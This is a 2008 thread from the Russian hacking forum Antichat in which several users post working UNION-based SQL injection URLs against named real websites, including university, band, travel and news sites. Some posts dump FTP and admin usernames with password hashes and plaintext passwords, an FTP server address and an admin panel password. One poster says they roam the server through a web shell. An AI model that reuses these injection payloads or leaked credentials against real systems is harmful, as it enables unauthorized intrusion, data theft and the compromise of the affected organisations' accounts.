ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6371  
Старый 18.08.2008, 04:30
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Премного извинюсь, ибо в бояне есть http://odmu.edu.ua
Если господа модераторы сочтут, что данный пост есть зло - честно обзусь моментально удалить.

Дело в том, что по поиску не нашел описания хека данного ресурса. Вдобавок есть куча смежных поддоменов к данному сайту. В общем раскрутил - если что - удалю...

http://odmu.edu.ua/index.php?v=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6+from+proftpd.users+limit+0,100/* Выборка по ftp юзерам

osas:::Z5ESqlRtTrt7Y
anatomka:::Pgwl.XrN4bs1o
phosas:::KGt4CWj1zvBWc
osasod:::JO96GZfMHu0BU
adminweb:::MEDINedu
sopott:::M.NEksFkXBxfk
admfoto::WJc7OVOTQRkFs
userfoto::RsRvTv93
biophys:::gjtqJLxY0FDrM

ftp://217.146.249.35 <-тыкаем сюда
--------------------------------

пример: login: biophys pass: gjtqJLxY0FDrM
http://www.biophys.odmu.od.ua/


login: adminweb pass: MEDINedu
ftp://www.odmu.edu.ua/

http://www.odmu.edu.ua/_.php <-админка
Пароль: k.,bvfz ie,rf

С помощью шела путешествуем по серверу на котором висит все это чудо.
 
Ответить с цитированием

  #6372  
Старый 18.08.2008, 09:52
Аватар для Glazz
Glazz
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332

Репутация: 15
По умолчанию

Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
 
Ответить с цитированием

  #6373  
Старый 18.08.2008, 10:12
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Цитата:
Сообщение от Glazz  
Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
Код:
http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
Цитата:
4.1.22-standard:lyapis_lyapis:lyapis_lyapis@localhost
4

5
 
Ответить с цитированием

  #6374  
Старый 18.08.2008, 11:22
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://fiske.colorado.edu/staff/index.php?id=-2+union+select+1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8+from+INFORMATION_SCHEMA.tables+limit+17,1/*
 
Ответить с цитированием

  #6375  
Старый 18.08.2008, 13:12
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Академия Наса.. )))

http://www.nasa-academy.org/db/yearbookview.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,'<b>' ,middlename,0x3a3a,login,0x3a3a,password,0x3a3a,pa ssword_expire,'</b>'),10,11,12,13+from+academy.alumni+limit+31,60/*

Выборка по юзерам.

http://www.nasa-academy.org/db/login.php аутентификация

Шняга: х*** пойми как захеширован пароль. ибо некоторые побдираются, но система не логинится. МБ дабл хеш?


К тому же походу file_priv разрешены, но пути х** нарыл...
 
Ответить с цитированием

  #6376  
Старый 18.08.2008, 15:46
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

www.mirtravel.com
Код:
http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(table_name,0x3a,column_name)+FROM+information_schema.columns/*
Код:
http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(nusr,0x3a,pusr)+FROM+usr/*
mir:4b53ed9250ece8ed
admin:e1eba9bbbb04da14e0f0b1cec9eea708:zzz123
Это логин под форум по ходу, а админка без пароля штоле http://www.mirtravel.com/admin/

Последний раз редактировалось Ponchik; 18.08.2008 в 16:01..
 
Ответить с цитированием

  #6377  
Старый 18.08.2008, 17:20
Аватар для luz3r
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600

Репутация: 850
По умолчанию

Цитата:
Сообщение от S0ulVortex  
http://www.grand-elizaveta.ru/otziv/?action=showreplies&fid=1&topic=1&start=-1
Народ похоже на order by незнаю как раскрутить 1 рас встречаюсь стакой
Что значит похоже на ордер бай? order by ето оператор он не пожет быть похож или нет... он в вводить при правильном значении..... а так если подставить кавычку там скули нет... там про100 ошибка обращения.
 
Ответить с цитированием

  #6378  
Старый 18.08.2008, 18:24
Аватар для SVAROG
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию

http://www.aei-brookings.org/events/page.php?id=-152+union+select+1,2,version()/*
version: 4.0.25-standard-log
database: aei_brooking
user: aei_brookings@10.225.135.70


http://aviation-safety.net/wikibase/wiki.php?id=-16509+union+select+1,version(),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2/*
version:mysql-s-22-4.1. ???

http://www.davisvisitor.com/sub.php?id=-1+union+select+1,2,3,4,5,version()/*
version: MySQL 4.0.16


http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,4,5,TABLE_SCHEMA,COLUMN_NAME, 8,9,0,1,2,3,4,5,6,7,8,9+from+information_schema.CO LUMNS+WHERE+TABLE_NAME=%22users%22+limit+26,1/*
version: MySQL 5.0.27-standard


http://www.coinsportal.ru/Bibliotheka/Article.php?ID=-1+union+select+1,2,version(),4,5/*
version:MySQL 4.0.18
 
Ответить с цитированием

  #6379  
Старый 19.08.2008, 01:14
Аватар для SVAROG
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию

http://www.roguegovernment.com/news.php?id=9770+union+select+1,version(),3,4,5,6, 7,8,9,0/*
версия:mysql4.1.22-standard
выод между тегами title
PR: 5
 
Ответить с цитированием

  #6380  
Старый 19.08.2008, 09:49
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://www.vdv.gcg.ru/forum/index.php?id=-2304+union+select+concat_ws(0x3a,version(),user(), database())--


http://www.iclogic.com/catalogue/organisations/showorg.php?id=-1372+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15--

edited: http://www.aktem.ru/frame.php?action=book&ID=-1111+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8--

Версии 4.*

Последний раз редактировалось Calcutta; 19.08.2008 в 10:44..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ